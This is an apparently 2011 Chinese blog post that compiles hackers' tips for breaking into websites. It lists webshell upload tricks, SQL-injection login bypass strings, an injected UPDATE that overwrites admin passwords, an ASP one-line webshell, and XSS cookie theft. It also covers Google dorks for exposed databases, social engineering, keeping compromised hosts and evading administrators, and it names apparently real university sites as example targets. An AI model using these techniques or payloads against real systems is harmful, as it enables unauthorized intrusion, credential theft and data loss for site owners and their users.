各位大牛经典入侵经验摘录

1.无论什么站,无论什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,直接上传shell,诸位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点,而且很容易猜到,不过这种情况发生在asp居多!

2.asp(aspx)+MSSQL先考虑注入,一般的注入都有DBowner权限可以直接写shell;如果写不了,或者web与数据库分离,那就猜数据,从后台下手了,后台可以上传或者改配置文件;

3.asp(aspx)+ACCESS拿shell一般只有3种方法,一是前台上传或者注入进后台上传;二是注入进后台改配置文件;三是注入进后台备份数据库或者暴库后知道是asp或者asa数据库于是直接写一句话;

4.php+MYSQL 一般是注入进后台上传,偶尔运气好些权限够高可以注入select into outfile;然后包含,分本地与远程,远程包含在高版本php是不支持的,于是想办法本地上传图片文件或者写到log里;然后php程序某某未公开的 漏洞,运气好可以直接写shell。

5.jsp+MYSQL利用数据库拿权限方面基本同php,而且jsp的上传基本很少检查文件后缀,于是只要有注入点与后台,拿shell相当的容易。jsp+ORACLE的站我碰到的不多,碰到的也是猜出用户名与密码从后台下手的。

6.无论什么大站,主站一般都很安全(不然早被人玩了),于是一般从二级域名下手,猜出主站的某些用户名与密码或者搞到主站的源代码,或者旁注得到同网段服务器后cain或arp。

7.一般的大站很少有用现成的CMS的,于是如果你有幸找到源码,那你就发了,注入漏洞啊,上传漏洞啊,写文件漏洞啊,都掌握在你手里。多看看那些大站新出来的测试分站点,那些站还在测试中,可以很轻松拿下。

8.上传有个文件名截断,这包括2个方面,一是00截断,二是长文件名截断(曾经利用这个搞下hw);然后很多写文件的地方,都可以00,屡试不爽。上传别忘了.asp(当然.asa,.cer,.cdx都可以啦)目录的妙用。

9.php 站无论windows还是linux,都有magic_quotes_gpc的问题,magic_quotes_gpc为on的时候,在server变量 注入的时候还是可以select into outfile,今年我搞过某未开源cms就是这个情况,一般情况下为on就别考虑写文件了,不过有这个权限别忘了读文件源码,因为load_file的 参数是可以编码的。

10.猜路径或者文件在入侵中非常必要,猜不到路径的时候别忘了google(baidu太烂,google很全),于是你可以考虑看站点下的robot.txt或者robots.txt,会有惊喜。

11.工具的使用很重要,入侵之前用WVS扫扫会有助入侵;注入工具虽然很多,但不见得都好使,现在的软硬防火墙、防注入越来越厉害,那时候你就别偷懒,多手工有助你成长。

12.遇到过一流监控么,遇到其他防post的防火墙么,有时候一句话进去了都无法传大马,那时候,你先学学编码,学学变换绕过。

13.想搞一般的小站,记得查看这个小站的版权,找做这个站的公司,然后从这个公司做的其他站下手,得到源码再回头搞,我曾经通过这个方法拿下某知名制药的公司站。

14.旁注的思路永远不过时,遇到dbowner的注入,可以很舒服写shell到你需要的站,省得麻烦的提权了;运气不好,按部就班拿shell提权得到你所需。

15.永远别忘记社会工程学,利用社工把自己当成一个什么也不会的人,从某某站长的qq,身份证,邮箱等等下手,也许有时可能会有意外;另外别忘记admin,admin;test,test;123456,123456这种简单的尝试,当然,你也可以暴力破解。

16.别忽视XSS,别忽视cookie,XSS可以偷cookie,更有若干妙用,自己学会领悟;cookie可以伪造登陆,cookie可以注入,cookie注入可以绕绝大多数的防火墙。

17.平时搞站多多搜集路径啊,源码啊,工具啊,充实自己的“武器”库;最好把自己的入侵步骤记录下来,或者事后反思下,我一般都是记在txt里,另外要做到举一反三。

18.多学习,多看源码,多看公布出来的0day,脚本是入侵的前提,而不是工具,会用工具会装B你还没入门。
------------------------------------------------------------------------------
目标:www.***.com
|--探测开放的服务
溢出
弱口令
分析网站目录结构
整站程序Bug 黑白盒测试 获取SHELL
nslookup 列出所有二级域名 逐个分析
探测弱口令
注入
嗅探+arp
收集一切能收集管理员信息 充分应用baidu google 实现社会工程序
------------------------------------------------------------------------------
1、pangloin对oracle注入点的误报率偏高!

2、SQL语句有时候虽然暴错,我们的语句也有可能成功了!

3、0判断权限不准确;

4、在PCANYWHERE提权的时候常碰到连上去还要输入WIN密码,网上流传的方法操作起来不切实际,其实连上去就等于拿到系统权限了,大家自己研究,这里提一下;

5、oracle注入不支持多句执行,如update等语句;

6、linx自动攻击器局限性很大,没有手工准确

7、内网渗透时尽量少登录3389,以免被管理员发现;

8、会免杀对渗透来说如虎添翼;

9、如果你想留住这台肉鸡,抓HASH,搞到FTP等信息都是有必要的。

10、社工的力量很强大,真的。
------------------------------------------------------------------------------
某菜鸟总结:
1.上传漏洞[不多讲] pS: 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了! 有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.

2. 注入漏洞[不多讲] pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令: http://注入网址;update admin set password=’新MD5密码’ where password=’旧MD5密码’-- [admin为表名.]

3.COOKIE诈骗:把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。

4.暴库:把二级目录中间的/换成%5c EY:http://www.ahttc.edu.cn/otherweb ... s.asp?BigClassName=职责范围&BigClassType=1 如果你能看到:’

’E:\ahttc040901\otherweb\dz\database\iXuEr_Studio.asa’ 不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。 这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.

5.'or' = 'or'这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有: ’or’’=’ \" or \"a\"=\"a ’) or (’a’=’a \") or (\"a\"=\"a or 1=1-- ’ or ’a’=’a

6.社会工程学。这个我们都知道吧。就是猜解。 EY:http://www.neu.edu.cn/waishi/admin admin waishi

7. 写入ASP格式数据库。就是一句话木马[〈%execute request(\"value\")%〉 ],常用在留言本. EY:http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[这个就是ASP格式的数据库],再写入一句话木 马

8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改. EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp 这个站用的是:杰出校友录,源码我下过了, 默认数据库/webshell路径:\database\liangu_data.mdb 后台管理:

9. 默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL. /Databackup/dvbbs7.MDB /bbs/Databackup/dvbbs7.MDB /bbs/Data/dvbbs7.MDB /data/dvbbs7.mdb /bbs/diy.asp /diy.asp /bbs/cmd.asp /bbs/cmd.exe /bbs/s-u.exe /bbs/servu.exe 工具:网站猎手 挖掘鸡 EY:http://www.heimian.com/bbs/Databackup/dvbbs7.MDB

10.查看目录法:人一些网站 可以断开目录,可以方问目录。 EY:http://www.ujs168.com/shop/admin/ http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/ 这样我们可以找到数据库,下载不用我教吧

11.搜索引擎利用: (1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/ (2).找网站的管理后台地址: site:xxxx.comintext:管理 site:xxxx.comintitle:管理 〈关键字很多,自已找〉 site:xxxx.cominurl:login (3).查找access的数据库,mssql、mysql的连接文件 allinurl:bbsdata filetype:mdbinurl:database filetype:incconn inurl:datafiletype:mdb 我主不做了。。自已做做吧。。

12.旁注,也就是跨站. 我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们要入侵的站点。

posted @ 2011-05-28 03:03  WHaa_(T_T)  阅读(325)  评论(0编辑  收藏  举报